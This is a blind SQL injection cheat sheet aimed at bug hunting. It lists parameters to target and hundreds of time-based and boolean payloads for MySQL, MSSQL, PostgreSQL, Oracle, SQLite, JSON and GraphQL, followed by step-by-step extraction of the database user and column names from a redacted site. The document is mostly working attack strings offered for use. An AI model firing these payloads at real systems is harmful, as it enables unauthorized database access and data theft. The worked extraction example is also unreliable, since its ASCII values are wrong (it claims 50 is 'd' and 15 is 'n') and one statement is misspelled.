Table of Contents
Blind SQL Injection is a type of SQL Injection where the attacker does not directly see the output of the injected query. Detection and exploitation of blind SQL injection often rely on observing indirect indicators, such as changes in webpage behavior, delays in response times, or DNS lookups.
HUNT for Blind SQL Injection:
Time-Based (GET, POST, PUT)
Apply on
Search
First name, last name, number, any kind of date, Email or Password (register, login, reset password) Any kind of Product, menu, keyword, payment Cookie, User agent, Referer, X-Forwarded-For
Parameter list (regular):
id
cid
pid
page
search
username
name
register
first name
last name
email
pass
password
dir
category
class
register
file
news
item
menu
lang
name
ref
title
time
view
topic
thread
type
date
form
join
main
nav
region
select
report
role
update
query
user
sort
where
params
process
row
table
from
results
sleep
fetch
order
keyword
column
field
delete
string
number
filter
Detecting Blind SQL Injection
Boolean-based Blind SQL Injection:
This technique relies on injecting SQL queries that return different results based on a true or false condition. The web application’s response will vary, revealing whether the injected part was true or false.
Example Payloads:
- Oracle:
' OR '1'='1 --
- Microsoft SQL Server:
' OR 1=1 --
- PostgreSQL:
' OR 1=1 --
- MySQL:
' OR 1=1 --
- SQLite:
' OR 1=1 --
If the application behaves differently (e.g., displays different content or errors), it indicates a potential SQL injection vulnerability.
Time-based Blind SQL Injection:
This technique relies on causing a delay in the web application’s response if the injected query is true.
Example Payloads:
- Oracle:
'; BEGIN dbms_pipe.receive_message(('a'),10); END; --
- Microsoft SQL Server:
'; IF (1=1) WAITFOR DELAY '0:0:10'; --
- PostgreSQL:
'; SELECT pg_sleep(10); --
- MySQL:
'; SELECT SLEEP(10); --
- SQLite: (SQLite does not natively support time delays, but can be tested indirectly through application-level behavior)
MySQL Blind (Time Based):
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(),sleep(5),0)
'XOR(if(now()=sysdate(),sleep(5),0))XOR'
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'
0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z
0'or(now()=sysdate()&&SLEEP(1))or'Z
if(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/
if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/
if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/
if(1=1,sleep(5),0)/*'XOR(if(1=1,sleep(5),0))OR'"XOR(if(1=1,sleep(5),0))OR"*/
if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(5),0))OR"*/
SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/
%2c(select%5*%5from%5(select(sleep(5)))a)
(select(0)from(select(sleep(5)))v)
(SELECT SLEEP(5))
'%2b(select*from(select(sleep(5)))a)%2b'
(select*from(select(sleep(5)))a)
1'%2b(select*from(select(sleep(5)))a)%2b'
,(select * from (select(sleep(5)))a)
desc%2c(select*from(select(sleep(5)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--
'+(select*from(select(sleep(5)))a)+'
(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"
(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*%2f
(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*/
(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'\"+(select(0)from(select(sleep(5)))v)+\"*/
',''),/*test*/%26%26%09sLeEp(5)%09--+
AND BLIND:
1 and sleep 5--
1 and sleep 5
1 and sleep(5)--
1 and sleep(5)
' and sleep 5--
' and sleep 5
' and sleep 5 and '1'='1
' and sleep(5) and '1'='1
' and sleep(5)--
' and sleep(5)
' AnD SLEEP(5) ANd '1
and sleep 5--
and sleep 5
and sleep(5)--
and sleep(5)
and SELECT SLEEP(5); #
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
' AND SLEEP(5)#
" AND SLEEP(5)#
') AND SLEEP(5)#
OR BLIND:
or sleep 5--
or sleep 5
or sleep(5)--
or sleep(5)
or SELECT SLEEP(5); #
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
' OR SLEEP(5)#
" OR SLEEP(5)#
') OR SLEEP(5)#
')) or sleep(5)='
" or sleep(5)#
1) or sleep(5)#
)) or sleep(5)='
1)) or sleep(5)#
or sleep(5)#
%20'sleep%2050'
%20$(sleep%2050)
")) or sleep(5)="
or sleep(5)='
") or sleep(5)="
) or sleep(5)='
1 or sleep(5)#
You can replace AND / OR
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('PBiy'='PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337'='1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337'='1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337' LIKE '1337
%' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337%'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337' LIKE '1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337"="1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337"="1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337"="1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337" LIKE "1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
RLIKE BLIND:
You can replace AND / OR
RLIKE SLEEP(5)--
' RLIKE SLEEP(5)--
' RLIKE SLEEP(5)-- 1337
" RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5) AND ('1337'='1337
')) RLIKE SLEEP(5) AND (('1337'='1337
'))) RLIKE SLEEP(5) AND ((('1337'='1337
) RLIKE SLEEP(5)-- 1337
) RLIKE SLEEP(5) AND (1337=1337
)) RLIKE SLEEP(5) AND ((1337=1337
))) RLIKE SLEEP(5) AND (((1337=1337
1 RLIKE SLEEP(5)
1 RLIKE SLEEP(5)-- 1337
1 RLIKE SLEEP(5)# 1337
) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
1 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' RLIKE SLEEP(5) AND '1337'='1337
') RLIKE SLEEP(5) AND ('1337' LIKE '1337
')) RLIKE SLEEP(5) AND (('1337' LIKE '1337
'))) RLIKE SLEEP(5) AND ((('1337' LIKE '1337
%' RLIKE SLEEP(5) AND '1337%'='1337
' RLIKE SLEEP(5) AND '1337' LIKE '1337
") RLIKE SLEEP(5) AND ("1337"="1337
")) RLIKE SLEEP(5) AND (("1337"="1337
"))) RLIKE SLEEP(5) AND ((("1337"="1337
" RLIKE SLEEP(5) AND "1337"="1337
") RLIKE SLEEP(5) AND ("1337" LIKE "1337
")) RLIKE SLEEP(5) AND (("1337" LIKE "1337
"))) RLIKE SLEEP(5) AND ((("1337" LIKE "1337
" RLIKE SLEEP(5) AND "1337" LIKE "1337
' RLIKE SLEEP(5) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
ELT Blind:
You can replace AND / OR
' AND ELT(1337=1337,SLEEP(5))--
' AND ELT(1337=1337,SLEEP(5))-- 1337
" AND ELT(1337=1337,SLEEP(5))-- 1337
') AND ELT(1337=1337,SLEEP(5))-- 1337
') AND ELT(1337=1337,SLEEP(5)) AND ('1337'='1337
')) AND ELT(1337=1337,SLEEP(5)) AND (('1337'='1337
'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337'='1337
' AND ELT(1337=1337,SLEEP(5)) AND '1337'='1337
') AND ELT(1337=1337,SLEEP(5)) AND ('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(5)) AND (('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337' LIKE '1337
) AND ELT(1337=1337,SLEEP(5))-- 1337
) AND ELT(1337=1337,SLEEP(5)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(5)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(5))
1 AND ELT(1337=1337,SLEEP(5))-- 1337
1 AND ELT(1337=1337,SLEEP(5))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
1`=`1` AND ELT(1337=1337,SLEEP(5)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))|[1
%' AND ELT(1337=1337,SLEEP(5)) AND '1337%'='1337
' AND ELT(1337=1337,SLEEP(5)) AND '1337' LIKE '1337
") AND ELT(1337=1337,SLEEP(5)) AND ("1337"="1337
")) AND ELT(1337=1337,SLEEP(5)) AND (("1337"="1337
"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337"="1337
" AND ELT(1337=1337,SLEEP(5)) AND "1337"="1337
") AND ELT(1337=1337,SLEEP(5)) AND ("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(5)) AND (("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(5)) AND "1337" LIKE "1337
' AND ELT(1337=1337,SLEEP(5)) OR '1337'='FMTE
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
'||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'
'||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+'
||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
BENCHMARK:
You can replace AND / OR
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND =BENCHMARK(5000000,MD5(0x774c5341))--
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337
%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337%'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337"="1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337"="1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337"="1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND "1337"="1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337" LIKE "1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337" LIKE "1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337
" AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND "1337" LIKE "1337
' AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='1337
If the response is delayed, it indicates a potential SQL injection vulnerability.
Microsoft SQL Server Blind (Time Based):
;waitfor delay '0:0:5'--
';WAITFOR DELAY '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
") IF (1=1) WAITFOR DELAY '0:0:5'--
';%5waitfor%5delay%5'0:0:5'%5--%5
' WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '0:0:5'
or WAITFOR DELAY '0:0:5'--
or WAITFOR DELAY '0:0:5'
and WAITFOR DELAY '0:0:5'--
and WAITFOR DELAY '0:0:5'
WAITFOR DELAY '0:0:5'
;WAITFOR DELAY '0:0:5'--
;WAITFOR DELAY '0:0:5'
1 WAITFOR DELAY '0:0:5'--
1 WAITFOR DELAY '0:0:5'
1 WAITFOR DELAY '0:0:5'-- 1337
1' WAITFOR DELAY '0:0:5' AND '1337'='1337
1') WAITFOR DELAY '0:0:5' AND ('1337'='1337
1) WAITFOR DELAY '0:0:5' AND (1337=1337
') WAITFOR DELAY '0:0:5'--
" WAITFOR DELAY '0:0:5'--
')) WAITFOR DELAY '0:0:5'--
'))) WAITFOR DELAY '0:0:5'--
%' WAITFOR DELAY '0:0:5'--
") WAITFOR DELAY '0:0:5'--
")) WAITFOR DELAY '0:0:5'--
"))) WAITFOR DELAY '0:0:5'--
1 waitfor delay '0:0:5'--
1' waitfor delay '0:0:5'--
Postgresql Blind (Time Based):
";SELECT pg_sleep(5);
;SELECT pg_sleep(5);
and SELECT pg_sleep(5);
1 SELECT pg_sleep(5);
or SELECT pg_sleep(5);
(SELECT pg_sleep(5))
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
' SELECT pg_sleep(5);
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))-- 1337
1' AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND '1337'='1337
1') AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND ('1337'='1337
1) AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND (1337=1337
or pg_sleep(5)--
) or pg_sleep(5)--
)) or pg_sleep(5)--
Oracle Blind (Time Based):
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)-- 1337
' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND '1337'='1337
') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND ('1337'='1337
) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (1337=1337
Generic Time Based SQL Injection Payloads:
sleep(5)#
(sleep 5)--
(sleep 5)
(sleep(5))--
(sleep(5))
-sleep(5)
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
";sleep 5--
";sleep 5
";sleep(5)--
";sleep(5)
";SELECT SLEEP(5); #
1 SELECT SLEEP(5); #
+ SLEEP(5) + '
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
;sleep 5--
;sleep 5
;sleep(5)--
;sleep(5)
;SELECT SLEEP(5); #
'&&SLEEP(5)&&'1
' SELECT SLEEP(5); #
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
RANDOMBLOB(500000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
If the response delay is between 5 to 7 Seconds.It means vulnerable.
Blind SQL injection in JSON:
[-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))]
{AnD SLEEP(5)}
{1 AnD SLEEP(5)}
{1' AnD SLEEP(5)--}
{sleep 5}
"emails":["AnD SLEEP(5)"]
"emails":["[email protected]' OR SLEEP(5)#"]
{"options":{"id":[],"emails":["AnD SLEEP(5)"],
Blind Sql injection in Graphql:
{“operationName”:”pages”,”variables”:{“offset”:0,”limit”:10,”sortc”:”name Payload”,”sortrev”:false},”query”:”query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n”}
Example:
{"operationName":"pages","variables":{"offset":0,"limit":10,"sortc":"name AND sleep(5)","sortrev":false},"query":"query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n"}
Blind Sql injection exploitation (Manual):
MySql Time Based:
RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).
SELECT * FROM products WHERE id=1-SLEEP(5)
RESULTING QUERY (WITH MALICIOUS BENCHMARK INJECTED).
SELECT * FROM products WHERE id=1-BENCHMARK(100000000, rand())
RESULTING QUERY - TIME-BASED ATTACK TO VERIFY DATABASE VERSION.
SELECT * FROM products WHERE id=1-IF(MID(VERSION(),1,1) = '5', SLEEP(5), 0)
Time Based Sqli:
1 and (select sleep(5) from users where SUBSTR(table_name,1,1) = 'A')#
Error Blind SQLi:
AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
Ultimate Sql injection Payload:
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
Exploitation:
redact.com/page/search?q=1 and sleep(5)--
Current user:
redact.com/page/search?q=1 and if(substring(user(),1,1)='a',SLEEP(5),1)--
redact.com/page/search?q=1 and if(substring(user(),2,1)='a',SLEEP(5),1)--
redact.com/page/search?q=1 and if(substring(user(),3,1)='a',SLEEP(5),1)--
Table_name guessing:
redact.com/page/search?q=1 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)
redact.com/page/search?q=1 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)
redact.com/page/search?q=1 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--
Mssql Time Based:
RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).
SELECT * FROM products WHERE id=1; WAIT FOR DELAY '00:00:5'
RESULTING QUERY (VERIFY IF USER IS SA).
SELECT * FROM products WHERE id=1; IF SYSTEM_USER='sa' WAIT FOR DELAY '00:00:5'
Exploitation:
http://redact.com/page.aspx?id=1; WAITFOR DELAY '00:00:5'-- (+5 seconds)
TIME-BASED Extraction of CURRENT DATABASE USER
Determine Length of USER:
http://redact.com/page.aspx?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (LEN(USER)=4) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (LEN(USER)=5) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = 5 characters in length
Determine length, and then try to find out CHAR value one character position at a time, like this:
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>96) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>50) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>98) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1))=97) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the first character CHAR value is 97 which is an "a"
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))>99) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))=50) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the second character CHAR value is 50 which is a "d"
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))>58) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=59) WAITFOR DELAY '00:00:5'—
Result = third character CHAR value is 59 which is the letter "m"
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),4,1)))>54) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),4,1)))=55) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the fourth character CHAR value is 55 which is an "i"
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),5,1)))>59) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),5,1)))=15) WAITFOR DELAY '00:00:5'-- (+5 seconds)
the fifth character position has CHAR value of 15 which is the letter "n"
Database User = 97,50,59,55,15 = admin
TIME-BASED Extraction of 1st TABLE COLUMNS:
let’s enumerate some columns from the table(s) we found:
http://redact.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members')=4) WAITFOR DELAY '00:00:5'-- (+5 seconds)
You can check the length before you start testing away
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=117) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=115) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=51) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=114) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Column Name = 117,115,51,114 = user
Postgresql Blind SQLI(Stacked Queries):
id=1; select pg_sleep(5);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(5) end;-- -
